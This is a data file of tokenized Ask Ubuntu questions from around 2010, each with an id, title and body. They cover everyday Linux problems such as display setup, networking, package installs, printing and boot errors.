2601	gnome-mplayer to play on second screen with option xineramascreen	i am trying to make gnome-mplayer play a video in fullscreen on my second screen . i am using a nvidia card with xineramascreen . below is my ~/.mplayer/config file . [ default ] xineramascreen=1 [ gnome-mplayer ] ao=alsa : device=hw=1.0 msglevel=all=5 alang=english , eng , en slang=english , eng , en xineramascreen=1 the options have no affect , it plays on my primary screen as usual . running mplayer -xineramascreen 1 works perfectly , i just want gnome-mplayer to work since it 's nicer to use with gui and nautilus integration etc .
2605	installing by using wubi on windows vista 64	after reboot no windows partition is found and installation can not start . how can we solve this , in order to try ubuntu ? it says i only have free space available , but that is n't true . i 'm on the demo now . if i try to install from the demo , i do get : '' the following partitions can not be unmounted /isodevice ''
2606	byobu and ssh-agent	byobu can not connect to ssh-agent socket well . actually i can make just one connection via ssh-agent but if i try to establish another ssh connection using the agent , it does n't work . i 've tried setenv ssh_auth_sock `echo $ ssh_auth_sock` in ~/.byobu/profile but it did n't work as well .
2608	nautilus video thumbnails without totem	i 've removed totem and installed vlc instead . now video files thumbnails are gone . is there any way to get thumbnails back without reinstalling totem ? i know i can have both totem and vlc , but i really do n't want to have more soft than i need : )
2613	how to improve wireless network speed ?	i am running 10.04 lts on a desktop pc with a belkin g-plus mimo wireless network card . ever since running ubuntu on the machine i have noticed fairly slow network speeds ( about half the speed i get when running the same card through windows ) i did some research i found out that by and large wireless network cards are n't that well supported on most linux distros . i was wondering though if there is anything i could be tweaking on the system that could help squeeze a little more out of the card ? here is some more information *-network:1 description : wireless interface physical id : 2 logical name : wlan0 serial : 00:1c : df:24:5e:54 capabilities : ethernet physical wireless configuration : broadcast=yes ip=192.168.1.5 multicast=yes wireless=ieee 802.11bg
2616	change partition sizes after windows removal ?	let 's say we install ubuntu side by side with a windows installation . at that time , we will not have much space to play with so : / - 5gb /swap - 1gb /home - 5gb after that , we decide to remove windows . and we have much more space to play with . question : what program can we use , in order to easily change all partition sizes after windows removal ? thanks in advance , mem
2622	blank screen , blinking cursor on boot	occasionally my ubuntu 10.04 pc wo n't boot properly . it gets past grub and then stops at a blank screen and blinking cursor . from what i 've read , this blinking cursor screen is presented by ubuntu itself and not grub , so i assume the boot process gets halted for some reason . has anyone any guidance on how to diagnose this issue or what the cause is likely to be ? normally i need to press the reset button to reboot the pc and often it will reboot fine . the fact that it is intermittent is what confuses me . any pointers on diagnosing the problem would be much appreciated . edit : it 's been a while , mainly because my server has been up for a long time . it looks like i 've captured a recurrence of this issue , i copied the messages file and the dmesg file and had a look where processing seems to have stopped and found the messages below . i 'm going to do some research on google etc . but figured i 'd put it up here in case anyone can help and wants to earn themselves some points . i should mention that the ondemand governor failed message happens on successful boots but the other two do n't appear to . oct 11 23:17:21 linux kernel : [ 98.905370 ] ondemand governor failed , too long transition latency of hw , fallback to performance governor oct 11 23:21:48 linux kernel : kernel logging ( proc ) stopped . oct 11 23:21:48 linux rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 4.2.0 '' x-pid= '' 697 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . i found a few vague references to rolling over of logfiles at boot time being the cause
2624	when an application crash without output an error , is there a log that i can check ?	sometimes it happen that some application crash without give no output error ( conky in my case , probably is one of my configuration that is incorrect ) . is there somewhere a error log that i can check to understand why it is crashed ?
2628	how to change `` menu key '' to ctrl	i know the easy ways to remap caps lock , etc , but i have n't found out how to change my menu key to be an additional ctrl key . anyone know how to do this ? thanks .
2631	access server by host name ?	i have a mixed network with mostly windows machines , a mac , and a few linux boxes . there is no dns or wins server , and adding one is outside of my control . if i put a clean install of 10.04 desktop on a computer , then all other machines on the network can get to that machine by hostname just fine . however , if i put 10.04 server on the same computer , then the other machines can only get to it by ip address . the hostname does not resolve . what do i need to do on the server so that all the other machines on the network can get to it ?
2635	hibernate on dell inspiron 1525	i 'm ahving a dell inspiron 1525 . i installed there a stock ubuntu 10 . however i can see no `` hibernate '' item in the shutdown menu . is acpi supported on 1525 ? if it is , how can i make hibernate work there ? solved : my bad , swap was n't on .
2637	possible to limit the size of a window ( such as a browser window ) to exact pixel dimensions ?	is it possible set the size of a navigator or web browser window to exact pixel dimensions in ubuntu ?
2647	why do n't shortcut keys change when keyboard layout changes ?	when adding several keyboard layouts to ubuntu ( lucid ) , i experienced that any control key combination refers to the `` default '' keyboard layout . specifically , on a machine i have to prepare for others , i would like to set a default keyboard to a common layout . me myself , i like to type in dvorak , and therefore set this as a secondary layout ( in the system/preferences/keyboard/layouts menu ) so that i can switch to it when i am using the setup . throughout the system , the control key combinations refer to the default layout . i.e . to type ctrl-r for a reverse search in a terminal , i 'll have to hit the 'r ' key on the common layout . any ideas how to fix this ?
2652	how do i install xbmc ?	where can i get xbmc for ubuntu ? i have the team-xbmc ppa added however they have no packages , is there an older deb or is there somewhere where i can get the source and build myself ?
2655	window decoration of emacs23 window on fluxbox is outside screen	i am starting emacs remotely over an ssh connection . but on the emacs window i can not find a way to resize or move it . there is no fluxbox title bar visible , and i guess the title bar is above the visible viewport , because emacs starts vertically with more height than the screen has . the lower border of the emacs window is also below the viewport border , so i can not resize the window . i am starting emacs like this : emacs23 this is the emacs version : this is gnu emacs 23.1.1 ( x86_64-pc-linux-gnu , gtk+ version 2.20.0 ) of 2010-03-29 on yellow , modified by debian the remote system that runs emacs is 10.04 lucid lynx amd64 . the local system is running 9.10 karmic koala 32 bit and fluxbox 1.1.1-2
2659	choosing a file system ?	i 'm having a 250gb disk and 4gb ram . planning to use : / ( 15gb ) /swap ( 8gb ) /home ( the remaining ) my question is , for root and home , what file system should we choose . i see to many options ... should i go for fat32 ?
2667	apt-get stuck on libboo2.0.9-cil upgrade	for whatever reason , aptitude is stuck on upgrading libboo2.0.9-cil . i tried dpkg -- configure -a and restarting the upgrade , but that does n't seem to do anything . it just sits there on nyxtom @ ubuntu $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : google-chrome-unstable libboo2.0.9-cil 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 21.8mb of archives . after this operation , 1,606kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //dl.google.com/linux/chrome/deb/ stable/main google-chrome-unstable 6.0.495.0-r56152 [ 21.2mb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ lucid/universe libboo2.0.9-cil 0.9.2.3383+dfsg-1 [ 546kb ] fetched 21.8mb in 1min 6s ( 325kb/s ) ( reading database ... dpkg : warning : files list file for package `libboo2.0.9-cil ' missing , assuming package has no files currently installed . ( reading database ... 168942 files and directories currently installed . ) preparing to replace libboo2.0.9-cil 0.9.2.3383+dfsg-1 ( using ... /libboo2.0.9-cil_0.9.2.3383+dfsg-1_all.deb ) ... unpacking replacement libboo2.0.9-cil ...
2672	blank screen on boot after upgrade from 9.04 to 10.04 with a toshiba tecra a2 . fix ?	i can boot into recovery via grub and the low graphics mode option works but i do n't really know what to do from there to fix it so i can use a proper graphics mode . it is usuable now though some colours are missing . according to wikipedia the tecra a2 has 16-64 mb ddr ram intel graphic adapter . if that is worth anything . in windows these are driver details listed in the video properties : intel 82852/82855 gm/gme graphics controller .
2674	persistent installation to usb stick	i want to carry around a persistent installation of ubuntu on a usb stick with all my favourite bits of software . what 's the simplest way to do this ?
2677	how can i fix 'no wubildr ' error in wubi on windows 7 ?	good evening all , i just got my hp laptop back from the factory and then i tried to install ubuntu . it got through the whole installation , however , when i restarted and chose ubuntu a quick screen flashes that says : try ( hd0,0 ) ntfs5 : no wubildr try ( hd0,1 ) ntfs5 : then it quickly goes to the boot loader which i am presented with : windows 7 ( loader ) ( on /dev/sda1 ) windows vista ( loader ) ( on /dev/sda2 ) windows vista ( loader ) ( on /dev/sda3 ) of course if i click win 7 it 'll go to the main screen to choose between win 7 or ubuntu , if i choose vista , it 'll come with an error of sorts . the strange thing is , i looked in my c : / drive and i see wubildr and wubilder.mbr idk if it makes a difference but i am running a 64-bit processor . installed the 64-bit desktop version and am presented with ultra-fail . i 've gone to : http : //ubuntuforums.org/showthread.php ? s=4d54a8d3760f6fe805156524b7ab9acf & t=798283 & page=1 but have had no luck .
2678	how can i get kindle for pc to work in ubuntu using wine ?	i 've 'installed ' kindle using wine but it does n't work . the menu item is there but nothing seems to happen when i click it . i have set the application settings in wine config to run kindle as windows 98 as i 've seen suggested ... still no luck . any experience with this ? edit i do n't have a kindle , but i use kindle for android . i was wanting to be able to read my books on my pc without having to use windows .
2684	my home directory just goes away . why ?	i 'm running an older dell gx280 , with a new 500gb drive and 2gb ram . fresh install with my ~ directory copied from an older hd i got the 500gb to replace . i think i 'm running ext4 on both my / and /home partitions . and , if i run for a few days , i lose my ~/ directory . by which i mean , i can do anything with any file and directory in ~/ if i know what i 'm looking for , but if i do ls , or try tab-completion , or try to view it in nautilus , it hangs . then , i reboot , and everything is back together . what is it ? where do i start looking for problems ? i do n't know where to start googling for the answer . here 's my /etc/fstab jacoby @ oz : /var/log $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=4f677505-0b67-47b0-bbb4-858ffc1fe125 / ext4 errors=remount-ro 0 1 # /alt was on /dev/sdb1 during installation uuid=b0eec90c-d312-4123-b78c-7487a3347888 /alt ext4 defaults 0 2 # /home was on /dev/sda6 during installation uuid=1def350e-fe9a-40e3-8162-0a9f7ff8d5ef /home ext4 defaults 0 2 # swap was on /dev/sda5 during installation uuid=e62cd8c5-6088-44a8-84a6-7d399e42d81d none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0
2685	cloning textmate 's functionality with vim	tips and advice on how to clone textmate 's functionality in ubuntu . i 've done some research on this in the past and i know this information is valuable to the community .
2687	what is the gnome equivalent to kde kcontrol ?	i 'm looking for the gnome equivalent program to kcontrol . i 'm reading some online stuff and it says now run kcontrol , but i 'm on gnome , so what is the program for gnome that serves the same purpose .
2695	what packages do i need to install to compile kubuntu themes ?	what -dev packages do i need to compile kubuntu themes with , like the default oxygen theme uses ? do n't want to compile oxygen obviously , but i might want to compile others from kde-look.org down the road ... thanks in advance !
2700	why 60+ console-kit-daemon processes ?	i have over 60 processes of console-kit-daemon that wo n't stop reappearing after i 've used sudo killall console-kit-daemon . i have no idea what the daemon is for . i 'm running ubuntu 10.04 . what 's going on ?
2707	how to set up two screens in one vertical-one horizontal formation ?	i 've tried to set up that configuration a lot of times , but i 'm not able to make it work properly . i want to set up one of the screens as vertical and the other one as horizontal ... i 'm able to use then both as vertical or both as horizontal ... pd : i have an nvidia card , i 've talk with people that have ati cards and appears to be easier ... pd2 : i 'm using ubuntu 10.04
2708	is there a terminal/command-line interface to the 'appearance preferences ' dialog ?	hopefully the title sums it up , but i 'm looking for a way of being able to switch the appearance preferences ' visual effects option to 'none ' , from a terminal/script ( and optionally later to be able to switch back to 'normal ' , though that 's not such a big deal ) . i 'm a total ubuntu-noob , so i ca n't tell you which window manager/widget-set/whatever i am using ( gnome 2.30.0 ? ) . it 's on ubuntu 10.4 patched up to date as of late july 2010 .
2710	can i make pdf the default for 'print to file '	i am using 10.04 and i use the 'print to file ' feature a lot but it 's annoying to have to change the output option to to pdf each time . is there a way to make it the default ?
2711	locking updates to a specific mirror	my isp offers a freezone ubuntu mirror ( http : //ftp.iinet.net.au/pub/ubuntu/ ) however ubuntu is constantly pulling updates from a us server that is slower not inside my freezone how can i force ubuntu to use my local , freezone mirror before using others ?
2719	how do i output my audio input ?	a few iterations ago , i think this was jaunty but could 've been before , i would plug a 1/8 '' audio cable from the line-out of a windows netbook to the line-in of my ubuntu machine , so i would have all the sound from both machines without having to plug both into a mixer which i do n't have . i did n't do this much , as i was pretty-much happy with banshee at the time . but with karmic , and still with lucid , i can only get the output if i 'm recording with audacity . which i 'm not going to do from my web-development and systems programming workstation . i can tell by plugging in headphones that my netbook has audio out working . i can see sound preferences that the ubuntu machine is receiving them . i just want the old behavior back . help ?
2721	web server best practices : directory structure & security	i would like to utilize ubuntu server as web server , but i want to make sure i follow best practices for setting things up . i want to ensure i set the directory up in the best location and understand how to configure the appropriate security on that folder . i would like to be able to ftp to the server and push files into the web folders , so i would like to under stand how to ensure that my pureftpd user can manipulate files/directories within the web folders .
2724	best way to clone an installation ( copying to identical hardware )	kind-of like this question but slightly different ( i think ) , in that i have 6 identical acer aspire revo r3610 machines . one is ( almost ) configured to my requirements - when i 'm done preparing it i 'd like to make the other 5 machines absolutely the same . i 'm very new to ubuntu , what 's the most straightforward ( easiest ) way of doing this ? the machines are going to live on different networks if that might otherwise be a problem ( eg with windows you can clone disks but you then have to make registry changes afterwards if they 're going to run on the same network etc ) . the hardware in all 6 machines is , i stress , the same ! how can i efficiently clone one source image on to these identical machines ? please restrict one software/solution per answer
2728	run itunes without virtualizing windows ?	i know i could use virtualbox or vmware , but does anyone know of a way to run itunes without having to run windows virtually on ubuntu ? will itunes run using wine ? is there a better more native way to run itunes ?
2751	how to calibrate my touchscreen on a hp pavilion tx2500 ?	i have a laptop ( hp pavilion tx2500 ) with touchscreen functionality , it works fine but is n't calibrated , what is the best way to do it ?
2755	install installer package on an installed system ?	i know this will be an odd question , but i was wondering if anyone knew how to install the ubuntu installer package in an ubuntu installation . to clarify , when you boot up to an ubuntu livecd , it 's got the installer program available so that you can install ubuntu to a drive . naturally , this program is not present in the installed ubuntu . is there , though , a way to download and install it like other packages ? invariably , someone will ask what i 'm trying to do , and the answer is that i do n't really know . i just kinda want to tinker around with the installer and look at it and play with it ; no particular reason . curiosity , mostly . thanks in advance for the help !
2759	how to remove a mounted volume icon on the desktop ?	each time my 3g vodafone k4505 pen get 's mounted by the system , i get a icon on my desktop . i would like to not have that icon each time i connect this 3g usb pen . how can we accomplish this ? thanks in advance , mem
2766	how to change screen brightness on samsung r519 with nvidia driver	is there a way to set the screen brightness on a samsung r519 with ubuntu 9.10 and the nvidia drivers ? i know that there is a way when using voria 's repository and the nouveau drivers . but switching between one and dual-screen mode takes too much time for daily use on a notebook .
2772	application use history	in windows xp , you can find out how often an installed application was used by going to the `` add/remove programs '' section . you can also get an estimate of how often the application was used . is there a way to do this in ubuntu ?
2773	how can i set computer usage time limits ?	i 've got an old computer that i put ubuntu on for my kids ( 11 , 9 , and 7 ) . they 're always fighting for who can get on the computer and i 'm sick of trying to figure out who has had enough time . anyway , they each have different accounts on the computer and i would like to find something similar to an internet cafăš type of solution that gives each user an allotted amount of time per day or week that they can be logged in . once the time is used up , they 're kicked off and ca n't log in again until their time is automatically reset . an example of how i would like this to work would be : child 1 gets 120 minutes per week . day 1 : 30 min day 2 : 0 min day 3 : 30 min day 4 : 30 min day 5 : 30 min day 6 : ca n't log in day 7 : ca n't log in day 8 : 30 min ( day one fell off the 7 day revolving time period ) . etc . is there anything like that available for ubuntu ?
2779	get lastest version of mono	what is the best way to get the latest version of mono on ubuntu ?
2781	when will gnome shell be the default interface ?	in what ubuntu release will gnomeshell become the default interface .
2784	ca n't install opensdk 6 - ubuntu 10.04	while trying to install openjdk to start installing netbeans 6.9 - i 'm getting this : the installation could have failed because of an error in the corresponding software package or it was cancelled in an unfriendly way . you have to repair this before you can install or remove any further software . i read it ... and i have no clue what to do next . : ( how can we repair that ? i have forget opensdk and i 'm trying the java one . all seems to go well ... but know i 'm stuck here : and here is the amazing question : how can i click or hit , or push or something , that ok ? arrows , page up and page down work . enter and click do n't . anyone ? k. regards , mem
2786	what is the relationship between ubuntu single sign on and launchpad login service ?	canonical operates at least two openid based login services within the ubuntu online world : ubuntu single sign on and the launchpad login service . according to the information in the footer of both sites they share the same backing software which is called canonical sso provider . my question is whether these two sites are entirely separate implementations or do they share the same user database ? alternatively , is there some other less direct relationship between the two services ? in other words , if i did n't have an account with either service and i created a new account with ubuntu single sign on would i then also have a launchpad login service account ? what about the inverse scenario ? i know that the launchpad login service existed earlier than ubuntu single sign on . i also know that i was able to use my existing launchpad login details with the ubuntu sso when it was launched . however , i 've never been clear if these are the same account or if my launchpad account was copied to the newer service and they are now separate .
2792	how do i get multiple workspaces in unity ?	this video from a unity developer shows him clicking on the workspace button in the launcher to use multiple workspaces ( aka virtual desktops ) . on my 2 netbooks clicking on that button only invokes the expose-like effect . is there a setting somewhere i can use to get this functionality , and if so , what is the keyboard shortcut to go along with it ?
2793	how do i remove or hide old kernel versions to clean up the boot menu ?	every time i install a new linux kernel , it gets left in the grub_config , making the boot menu longer each time . i know i can manually search through the installed packages and remove them . does ubuntu provide any easier way to clean them up or keep them from showing in the boot list ?
2799	how to merge several pdf files ?	there are a lot of software in windows to merge pdf files but how can we do the same in ubuntu ?
2806	how to change the highlight color of the workspace chooser toolbar applet ?	a recent update to ubuntu changed the way the workspace chooser panel applet worked . it used to highlight the choosen workspace as orange , and other workspaces would be not colored . now it is the reverse . is there a way to change this to set it back to the way it used to be ? the new scheme is counter intuitive to me , and even though i 've been using it for months i just ca n't get used to it .
2807	moving application windows from one workspace to another by dragging in the workspace chooser ?	the old workspace chooser allowed you to move application windows between workspaces by dragging them around in the workspace chooser . i much prefer that to the new workspace chooser 's method of dragging them off the side of the screen . for one thing , in order to drag a window from a different workspace into the one i 'm working in , i have to switch workspaces twice and unmaximize a maximized window with the new method , where with the old i simply had to drag . is there anyway to get this old functionality back in ubuntu 10.04 ?
2815	what does `` hardy '' mean in /etc/apt/sources.list ?	i see entries in /etc/apt/sources.list that say : deb http : //us.archive.ubuntu.com/ubuntu/ hardy universe i am using ubuntu 8.04 , and i do n't know what `` hardy '' means , though i suspect it has something to do with version ?
2817	tmpfs for cowbuilder builds ?	i 'm a packager , so i often need to use cowbuilder or pbuilder to build packages either for my own use or when i 'm sponsoring somebody elses ' work . on my laptop , my disk is n't the fastest in the world , so i 'm considering using tmpfs for the build area , /var/cache/pbuilder/build , to speed up the build process . files in there can get fairly large , for example right now i 've 2.2gb of data in that folder . in addition , cowbuilder works by making shallow cow copies ( using hardlinks i think ) . would it be feasible to mount the build directory under tmpfs ? i 'm on ubuntu 10.04 lucid lynx , but will be moving shortly to the prerelease of maverick meerkat . my machine has 4gb of ram .
2822	proper way to set up releases in launchpad ?	i 've only been a member of launchpad for about 3 months and i still am having trouble figuring out the terminology . i have created a project with one branch - trunk . i have committed a few times to this branch . i created a series called '0.1 ' and i want to provide a download . last time i did that , i had to create a milestone or something . whatever it was , i do n't get it . can someone please explain : series releases milestones and the purpose of each ?
2825	how do i use `` virsh shutdown '' on kvm domains to shut down ubuntu guests ?	i am using various kvm domains on a ubuntu server . both the host and guests run 10.04.1 , 2.6.32-24 kernel , virsh reports version 0.7.5 , kvm 0.12.3 . the guests boot automatically when the host boots and they have < features > < acpi/ > < features > in their configuration . i could never manage to make virsh shutdown mydomain on the host to have any effect . it responds with domain mydomain is being shutdown and the domain keeps happily running . virsh list still lists them in the state running . virsh destroy mydomain works fine , but of course that 's not really what i want , so most of the time i log into each one and shut them down manually , which is pretty annoying . i could n't really find any information on how virsh shutdown tries to shut the domain down . pointers to useful bits of documentation are welcome . what could cause this ? how is it supposed to work ?
2826	how do i make my own customized ubuntu sounds ?	i 'd like to be able to either make my own sound theme or perhaps find one that 's completely customizable i.e . how windows sound is customizable from the get go .
2829	email application for the computer-impaired	a member of my family has a moderate disability for dealing with computers . he is largely unable to engage technology in general , and most on-screen guis are confusing and upsetting . he is , however , able to use email and browse the internet to a limited degree , and he wants to progress in that . evolution works fairly well for the email . but i want to find a better software -- which in this case means simpler , easier and uncluttered . simpler -- does n't assume a heavy load of messages or super real-time exchange such as for chat . does n't present many features beyond the minimum . easier -- has a highly fool-proof gui . uncluttered -- no sidebar with advertisements . no extraneous pop-ups . i am certain the gmail interface would not be acceptable ( complex , visually cluttered , a bit hard to second-guess if you are n't computer-savvy ) . three years ago i tried thunderbird , but evolution seemed to have a better gui . i guess i 'm looking for the email-browser equivalent of a jitterbug phone . perhaps something designed for assistive technology is available . what would you recommend ?
2830	switch user fails to complete successfully	switching users is not reliable ; when switching users , often when returning to the first logged-on user , the computer ends up a blank screen and i must turn it fully off with the power button . success is somewhat likely if a minimum of programs are running . i prefer a complete log-off , as it is . because there is a lot of screen flickering generally during these operations , i have taken care to make the monitor settings identical . but this does n't help . i use ubuntu lynx with gnome desktop . i have an nvidia 3dforce fx5600 , set to 1280x960 at 60hz ; displayed on a viewsonic vg2021m . `` desktop effects '' is set to lowest/normal ( solves bad screen-flicker issue ) . the gnome-power-manager app is removed because it caused problems when logging off . your recommendation ? update will re-install fresh with meerkat 10.10 and update this post when i see what i 've got .
2835	403 forbidden error when accessing enabled virtual host	when accessing a site defined in my local dev environment , i ca n't seem to get past a 403 forbidden error . under /etc/apache2/sites-available/ i have defined a file fun.local : < virtualhost *:80 > servername fun.local documentroot /home/noah/work/fun errorlog /var/log/apache2/fun-error.log < directory /home/noah/work/fun > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > the the apache error log for the site contains this error : [ sat aug 21 13:34:34 2010 ] [ crit ] [ client 127.0.0.1 ] ( 13 ) permission denied : /home/noah/.htaccess pcfg_openfile : unable to check htaccess file , ensure it is readable i am running apache2 and ubuntu 10.04 .
2837	instant messager that supports video and voice chat	are there any instant messengers for ubuntu that support video and audio chat ?
2839	how do i communicate with the ubuntu kernel team ?	how do i communicate with the ubuntu kernel team ?
2840	i 'm getting an error when i try to install the amazon mp3 downloader	when i run the .deb file i downloaded from here , i get this error : error : dependency is not satisfiable : libboost-filesystem1.34.1 does anyone know a work around for this ?
2842	how do i get involved with the ubuntu kernel ?	how do i get involved with the ubuntu kernel ?
2852	network print to brother mfc-7420	i am trying to pint to a brother mfc-7420 from my ubuntu 10.04 machine . the brother is attached to a windows xp machine and is shared . this is what i have tried : system- > administration- > printing , add , expand network printer , windows printer via samba , browse ( i can find the printer no problems here ) , foward , choose driver dialog , brother , my printer is not in this list so the next thing i tried was to download the printer driver from here http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html the driver installed fine but my printer still does not appear in the list . i also tried installing the cups wrapper but that gave the following error . restarting common unix printing system : cupsd [ ok ] cp : can not stat `/usr/share/cups/model/mfc7420.ppd ' : no such file or directory dpkg : error processing cupswrappermfc7420 ( -- install ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : cupswrappermfc7420 i tried connecting the printer directly but even though i have installed the driver , when i go to printers and click on the printer ( it shows up fine as a usb printer ) then it say searching for drivers and then gives me a list , this is the same list as before which does n't have my printer . it really should n't be this hard . on window you do n't have to installing anything it just works and the same is true for my brothers mac . how do i print to my printer ?
2855	locale : reset lost settings	due to some strange reason , i 've lost some of my locale settings . i 've managed to restore most of them using sudo dpkg-reconfigure locales : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory so i 'm stuck with one missing value : $ locale locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.utf-8 lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= any idea how to restore them all ? thanks , adam
2857	virtual ubuntu network configuration	i have ubuntu as main os . i have created virtual ubuntu in sun virtualbox and i get this error : can not connect ( ssh ) /ping computers in local network . if i configure network manually i even can not access to internet . if i choose dhsp then i can access to internet . do you have some solution how to connect computers in local network from virtual ubuntu ?
2866	symlinks and their paths are confusing - how can they be used effectively ?	when exploring directories from a symlink ( symbolic link ) using nautilus or gnome commander , the directory structure is displayed as if the symlink were a regular directory . when i open a document , apps differ in how they treat the path . for an .html document : opened w/ firefox : shows the real path as the address opened w/ netbeans : ditto opened w/ gedit : shows the symlink path as the address do i need to pay attention to these varying behaviors ? i feel insecure when the symlink path is offered ( because of my windows background ) -- can i ignore that ? can i proceed with confidence , and if so , does that cover all cases ? an app will occasionally ask me if i want to preserve symlinks , treat symlinks as actual links , and so on . ( ex. , copying in gnome commander presents an option called `` follow links '' ... which i assume means symlinks ) . your guidelines for that ?
2872	what are the biggest barriers to walking the motu/developer path ?	for those who are not motu ( people who maintain the universe and multiverse software repositories ) and do not have plans of the `` i will apply to motu by $ date '' variety : what keeps you and others like you from trying to become motu ? what makes you think you could n't become one ? i 'm referring to both social and technological barriers . edit : i 'm only saying motu because it 's a pretty generic group , but `` why are n't you packaging / patching and intending to eventually try for upload rights ? '' is an even more general version .
2877	can i rebuild a package without recompiling the source ?	i am building a new .deb and want to fix lintian errors in the packaging . however , every time i rebuild , the rules file does a 'make clean ' and thus starts compiling again . is there a way to instruct the build process that i do not want to recompile , that i 'm just altering the packaging , and using the last set of binaries will be fine for now ?
2884	how can i determine the version of the running kernel ?	how can i determine the version of the running kernel ?
2888	how do i get my webcam to work	i downloaded ubuntu over the weekend replacing windows vista and so far everything has been fantastic , except for one thing . i can not get my webcam to work . i 've tried camorama and camera monitor but they ca n't load an image . can anyone help with any apps that i can download ? many thanks updated 23/8/10 : i have two webcams that i can use - a microsoft lifecam vx-3000 and a trust wb-1400t webcam . i have downloaded 'cheese webcam booth ' , 'camorama webcam viewer ' and 'kamoso ' . i have read that there are a lot of problems using the ms lifecam with linux so any recommendations on webcams which work particularly well with ubuntu would be very much appreciated .
2890	google chrome removes itself from menu on reboot	chrome removes itself from the internet menu every time i reboot . how can i fix this ? the only way to get it back is to reinstall chrome . is this a dev issue or a general error ? i am using ubuntu 10.04.1 with gnome . chrome is the 6.0.495.0 dev version . i downloaded it here : http : //www.chromium.org/getting-involved/dev-channel
2895	how can i make a console window only appear if the command i 'm running produces output ?	i run the following at regular intervals in order to sync my laptop with my desktop . when there 's nothing to do , and therefore no output from unison , i want it to complete silently ; when there 's syncing to be done , t want it to pop up in a terminal so i can accept or reject changes as required . currently , it always pops up a window regardless and i 'm harassed by occasional blank terminals appearing and disappearing . here 's the command that i run automatically every 30 minutes or so : ps -e | grep -i unison || xterm -e 'unison -auto -perms=0 -terse local_sync can anyone think of a better way to accomplish this ? thanks .
2896	how do i setup a ubuntu network ?	i do some voluntary work for a small private k-12 school , and they just received a donation of about 20 used computers from a large corporation . they came with blank hard-drives , so i need to install an os and iâm thinking ubuntu might be a great option . ideally , i would like to have central user accounts and shared central storage . is there something similar to ms-ad for ubuntu ?
2901	unmanaged network icon - network manangement disabled	i was having problems connecting to the internet either by wireless or wired connection . i keep getting an icon in the systray that has a tooltip that says `` unmanaged '' and when i click on it i get a `` network management disabled '' . i googled and found the command : sudo dhclient eth0 which finally enabled my network and i have net . the problem is i still get the icon with the some word `` unmanaged '' can anyone help me out ? i just want to know what is happening and why did i had to go to the command line to enable my network . i had to put the computer in sleep mode and then it would n't wake up , so i rebooted the machine . the network manager problems started again , this time the file mentioned by maco had the value set to true and it still would n't work . anyone know how i can make this permanently work ? i did a sudo init 0 and when i booted the machine at a later time i had the network manager enabled . have no clue why .
2902	how to display umts signal strength ?	using a random umts usb stick ( huwei 160 or something like this ) works an current ubuntu pretty much out of the box and the setup via network manager ( nm-applet ) is convenient . but it does not display the current signal strength or modes of operation ( which speed-mode is used etc. ) . what are useful tools to display/monitor such information ?
2904	no internet after reinstalling on dell mini 9	i had to reinstall 10.04 . it had been working with no problems and then i did something . i decided that reinstall the o/s would be the easiest . it was until i found out i can not access internet . i am using a dell mini 9 . i use it primarily for the internet and need to figure out what to do . do you think i may need new drivers ? ?
2906	make gnome shortcuts available to other users	i have used alacarte to add some shortcuts to my games start folder . now i would like to make these shortcuts available for all users . how can i do this ?
2919	how to make indicator-network work with dsl ?	i installed indicator-network on maverick and it shows only ethernet with no option to add a dsl connection.i am using pppoeconf currently ( could be the problem ) .
2920	why `sudo apt-get install xxxx` sometimes request confirmation , others not ?	just for curiosity , sometimes while installing software throught apt-get install software_name the terminal prompt me for a confirmation `` type yes or no '' , but not allways . i dont mean the sudo password prompt , but the message `` will be downloaded and configrated xxx kb , continue ? '' ( or something similar ) why ?
2926	http : //localhost/ not working	i 've just done a fresh install of ubuntu ( 10.04.1 ) plus lamp ( via sudo tasksel install lamp-server ) and everything is working fine . however , it does so until i need to work on localhost when i do not have an internet connection . for example , as soon as i unplug the ethernet cable from the nic , localhost and 127.0.0.1 stop working . the message i get from the browser is : this web page is not available . then , as soon as i plug the ethernet cable into the laptop again , everything is back to normal again . i need to work on localhost sometimes when i do not have access to the internet . any idea how to fix this problem ? i had this problem before , but ca n't remember what i did to resolve it .
